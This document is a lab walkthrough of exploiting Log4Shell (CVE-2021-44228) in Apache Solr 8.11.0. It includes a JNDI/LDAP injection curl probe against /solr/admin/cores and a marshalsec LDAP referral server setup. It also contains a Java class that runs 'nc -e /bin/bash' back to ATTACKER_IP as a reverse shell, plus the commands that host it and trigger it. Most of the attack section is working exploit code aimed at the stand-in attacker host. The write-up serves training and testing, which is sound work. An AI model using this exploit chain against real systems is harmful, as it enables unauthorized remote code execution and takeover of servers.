The exploitation of a vulnerability named Log4Shell (CVE-2021-44228)

Intro

This lab covers the exploitation of a vulnerability in Log4j.

Apache Solr 8.11.0 is running on the target machine which this version of the software is prone to vulnerable log4j package (CVE-2021-44228). The application itself runs on Java 1.8.0_181.

Enum

We can see clear indicators of log4j used for logging activity when we browse Solr Admin Dashboard:

In order to find the injection point, we can review the log files of the “Solr”. The “solr.log” has a significant number of INFO entries showing repeated requests to one specific URL endpoint (/solr/admin/cores).

The “params” field name indicates some data entry point that we can use as an injection point. Here we can see from the inspected traffic with proxy.

PoC

The log4j package adds extra logic to logs by “parsing” entries, ultimately to enrich the data — but may additionally take actions and even evaluate code based on the entry data. This is the gist of CVE-2021-44228.

To exploit this issue, we need to have a malicious LDAP server.

The “Marshalsec” can be used for this part:

• https://github.com/mbechler/marshalsec

We need a public IP address and two ports: one for the LDAP server and one for the HTTP Server that will host the malicious class.

Let’s check if we can confirm whether the target is vulnerable or not.

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LPORT\}'

Output:

From the output, we can see that the netcat listener was able to catch inbound traffic from the vulnerable machine.

Well, run the below command to build the “marshalsec” utility:

mvn clean package -DskipTests

With the marshalsec utility, we can start an LDAP referral server to direct connections to our secondary HTTP server:

sudo java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://ATTACKER_IP:8000/#Log4jshell

Now, time to create a malicious class containing a reverse shell with Java.

“Log4jshell.java”:

public class Log4jshell {
   static {
       try {
           java.lang.Runtime.getRuntime().exec("nc -e /bin/bash ATTACKER_IP LPORT");
       } catch (Exception e) {
           e.printStackTrace();
       }
    }
}

Compile malicious payload:

javac Log4jshell.java

Output:

With python, we can run HTTP Server that hosts the malicious class.

python3 -m http.server 8000

Finally, we can request a malicious class in order to trigger the reverse shell and execute commands.

curl 'http://vulnsolr.loc:8983/solr/admin/cores?_=$\{jndi:ldap://ATTACKER_IP:LDAP_PORT/Log4jshell\}'

Output:

Disclaimer
All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.